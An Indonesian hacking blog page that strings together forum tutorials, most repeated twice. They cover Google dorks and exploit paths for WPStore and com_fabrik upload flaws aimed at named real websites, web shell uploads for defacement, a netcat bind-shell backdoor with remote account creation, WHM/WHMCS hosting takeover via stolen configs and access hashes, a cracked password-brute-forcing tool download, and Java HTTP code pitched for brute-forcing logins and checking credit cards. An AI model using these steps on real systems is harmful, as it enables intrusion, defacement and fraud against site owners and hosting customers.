Hack Web With WPStore
Hack Web With WPStore
oke ane newbie mau share tutor cupu
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
example :
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
![[Image: 1_zpsdb27a693.jpg]](http://i1307.photobucket.com/albums/s594/samwan_ady/1_zpsdb27a693.jpg)
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
![[Image: 2_zpsf63ee955.jpg]](http://i1307.photobucket.com/albums/s594/samwan_ady/2_zpsf63ee955.jpg)
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
buat para mastah mastah disini lewatin aja
oke kita langsung saja
dork :
inurl:ptype=store
inurl:ptype=cart
dork bisa dikembangin sendiri sesuai anda
tidak semua web bisa sukses dengan exploit ini
epxloitnya :
Quote:/wp-content/themes/framework/upload
example :
Quote:http://yourweddingdress.co.za/wp-content...rk/upload/
jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln
terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
Quote:username : root
password : toor
jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses
lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini
Quote:/wp-content/uploads/products_img/[nama shell anda].php
oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng
salam saya UZUMADY
deface dengan com_fabrik .
Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
![[Image: 3_zps5c343d96.jpg]](http://i1320.photobucket.com/albums/u537/vhera123/3_zps5c343d96.jpg)
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
![[Image: 4_zps8cde2690.jpg]](http://i1320.photobucket.com/albums/u537/vhera123/4_zps8cde2690.jpg)
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
![[Image: 5_zpsfe8fbe56.jpg]](http://i1320.photobucket.com/albums/u537/vhera123/5_zpsfe8fbe56.jpg)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....[/b]
Membuat Backdor di linux
1) siapkan 2 buah laptop sebagai percobaannya
2)Pada kedua komputer tersebut lakukan instalasi paket netcat
Code:
apt-get install netcat
3) Pada komputer target (server) buat backdoor dengan netcat
Code:
nc –l –p 5050 –e /bin/bash
catatan :-l : listen, siap menerima koneksi-p : pada port berapa koneksi diterima-e : jalankan perintah terminal yaitu /bin/bashSetelah itu cek dengan perintah nmap untuk melihat bahwa port 5050 dalam keadaan terbuka di sisi server.
Code:
# nmap localhost
4)Pada komputer penyerang, lakukan akses terhadap port diatas, kemudian buat account pada komputer server
Code:
# nc 192.168.50.10 5050debianGUI:~# nc 10.252.42.132 5050adduser datahack => buat user datahack disisi serverAdding user `datahack' ...Adding new group `datahack' (1002) ...Adding new user `datahack' (1002) with group `datahack' ...Creating home directory `/home/datahack' ...Copying files from `/etc/skel' ...datahack => buat password : datahackdatahack => retype passwordChanging the user information for datahackEnter the new value, or press ENTER for the defaultFull Name []:Room Number []:Work Phone []:Home Phone []:Other []:yIs the information correct? [Y/n] y^C
5) Dari account yang sudah dibuat diatas, lakukan koneksi dengan telnet ke sisi server, sehingga anda sudah berhasil masuk ke sisi server.
Code:
# telnet 192.168.50.10
Download RAR Password Unlocker 4.2.0 Full Crack
Kesempatan kali ini kita akan membahas tentang cara membuka file WinRar yang telah di password. Mungkin artikel ini bermanfaat bagi para netter yang mengalami permasalahan untuk mengekstrak file yang di kompres dengan Winrar, yaitu lupa password untuk membuka berkas filenya.
Untuk melakukan hal tersebut dibutuhkan sebuah Tools bantu yaitu, "WinRar.PW.Remover-hs"
Berikut cara untuk membuka File WinRar yang telah di Password :
1. Instal Aplikasi tersebut ke dalam sistem komputer anda.
2. Jalankan Aplikasi dimaksud.
3. Klik tombol Open "RAR File"
4. Pilih Metode untuk membuka Password File Rar-nya, misalnya : "Brute-Force Attack"
5. Klik tombol Start, tunggu sejenak hingga muncul PopUp hasilnya.
Untuk mendapatkan tools-nya silahkan Download di sini
note: tanda * / %2A di link diatas dihilangkan buat bisa ngedownload gan
semoga bermanfaat gan
Untuk melakukan hal tersebut dibutuhkan sebuah Tools bantu yaitu, "WinRar.PW.Remover-hs"
Berikut cara untuk membuka File WinRar yang telah di Password :
1. Instal Aplikasi tersebut ke dalam sistem komputer anda.
2. Jalankan Aplikasi dimaksud.
3. Klik tombol Open "RAR File"
4. Pilih Metode untuk membuka Password File Rar-nya, misalnya : "Brute-Force Attack"
5. Klik tombol Start, tunggu sejenak hingga muncul PopUp hasilnya.
Untuk mendapatkan tools-nya silahkan Download di sini
note: tanda * / %2A di link diatas dihilangkan buat bisa ngedownload gan
semoga bermanfaat gan
Hack Web Host Manager (WHM)
Assalammualaikum…
Hallo
sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo
hacking2an.. hehehe :D oke sekarang saya mo bahas mengenai cara Hack Web Host Manager
(WHM) :p
Apa
itu Web Host Manager (WHM) ? >>>> Google aja yah :p
Sebelum
itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol
:D Nah,
Kalo hack WHM, disini kita butuh Config WHMCSnya :3 ga
semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa
juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri
yah :p utk config killernya bisa
gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita
sebelumnya Cara mencari config dalam website
Perhatian!
Tutorial ini dibuat sebagai pengetahuan
dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini
seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak
bertanggung jawab! Use at your own risk!
Pesan Onix AQua:
Gunakan ilmu dengan sebaik2nya,
karena 1 kebaikan yg kalian buat, maka 1000 kebaikan yang akan kalian
dapatkan. dan juga sebaliknya, jika 1 keburukan yang kalian lakukan,
maka 1000 keburukan akan selalu kalian dapatkan selama hidup!
Berikut
bahan2 yg sobat butuhkan:
- Web Shelled
- Whmcs killer
- Config whmcs
Disini saya udah nemu config WHMnya :
isi dalamnya seperti :
Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!
Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p
Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account
Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087
cth: 176.32.342.223:2086
udah pada bisa kan? kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:
Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini
kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.
kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:
Header Name : Authorization
Header Value : WHM username:AccessHash
Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start
Setelah itu tinggal sobat buka WHMnya.. IP:Port
Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah, maaf kalo masih semerawut :D
CREDIT : ONYQ AQUA
JAVA HOW TO SEND HTTP POST/GET REQUEST
Halo,lama ga temu ama akuh 
sibuk ngegame :v
oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST
biasanyakan kalo kita buka website atau masukin login info make browser
nah ada kalanya kita pengen auto submit login info atau data kita ke server
contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what
i mean ]
semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.
aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi
"oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"
kita bikin di localhost dengan nama test.php
oke udah jelaskan,berarti link itu mengambil variable nama,berarti kita mengirim variable nama menggunakan java
pastikan library HttpClient di project java kamu.
ini contoh basic pengiriman post http menggunakan java
ini contoh basic pengiriman post http menggunakan java
result
run:
respon : HTTP/1.1 200 OK
Hallo DIKA_XB
BUILD SUCCESSFUL (total time: 0 seconds)
![[Image: 1240199_4679724971405_1987862796_n.jpg]](https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-ash3/1240199_4679724971405_1987862796_n.jpg)
nah terus gmn cara tau website itu minta variable apa aja ?
gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
httpclient jg support cookie,jadi kita bisa seperti browser biasa.
monggo aku jg masih belajar,diskusi bareng bareng
sibuk ngegame :v
oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST
biasanyakan kalo kita buka website atau masukin login info make browser
nah ada kalanya kita pengen auto submit login info atau data kita ke server
contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what
i mean
]semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.
aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi
"oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"
kita bikin di localhost dengan nama test.php
PHP Code:
<?php
$nama = $_POST['nama']; // mengambil variable nama yang di kirim melalui http postif ($nama =="")
{
echo "Hallo " .$nama;
}
else
{
echo "client tidak mengirim variable nama";
}?>pastikan library HttpClient di project java kamu.
ini contoh basic pengiriman post http menggunakan java
ini contoh basic pengiriman post http menggunakan java
Code:
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package hn_httprequest;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.Consts;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
/**
*
* @author xb
*/
public class Main {
/**
* @param args the command line arguments
*/
public static void main(String[] args) {
try {
//ini alamat host/file yang kita minta/buka
String link = "http://localhost/test.php";
//deklarasikan http clientnya
DefaultHttpClient httpclient = new DefaultHttpClient();
//deklarasikan http responsennya
HttpResponse response;
//deklarasikan http postnya,ini untuk handle pengiriman requestnya
HttpPost httpost = new HttpPost(link);
//bikin array untuk tempat pengisian data yang mau di kirim
List<NameValuePair> data_post = new ArrayList<NameValuePair>();
//lalu masukan value post yang mau di kirim,pada kalo ini kita masukin variable nama dengan value dika_xb
data_post.add(new BasicNameValuePair("nama", "DIKA_XB"));
//masukan array yang berisi data yang mau di kirim ke httpost
httpost.setEntity(new UrlEncodedFormEntity(data_post, Consts.UTF_8));
//kirimkan data,lalu ambil respon dari server dengan httpresponse
response = httpclient.execute(httpost);
//ini deklarasi untuk mendapatin elemen elemen data yang udah kita ambil di httpresponse
HttpEntity entity = response.getEntity();
//oke kita coba untuk menampilkan respon server/halamannya
StringBuilder sb = new StringBuilder();
BufferedReader rd = new BufferedReader(new InputStreamReader(response.getEntity().getContent()));
int linex;
while ((linex = rd.read()) != -1) {
sb.append((char) linex);
}
//kita tampilkan status respon server,apakah dia 404 atau yg lain
System.out.println("respon : " + response.getStatusLine());
//kita tampilkan html responsenya
System.out.println(sb.toString());
} catch (Exception e) {
System.out.println("error " + e);
}
}
}result
run:
respon : HTTP/1.1 200 OK
Hallo DIKA_XB
BUILD SUCCESSFUL (total time: 0 seconds)
nah terus gmn cara tau website itu minta variable apa aja ?
gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
httpclient jg support cookie,jadi kita bisa seperti browser biasa.
monggo aku jg masih belajar,diskusi bareng bareng
Subscribe to:
Posts (Atom)
0 comments
Post a Comment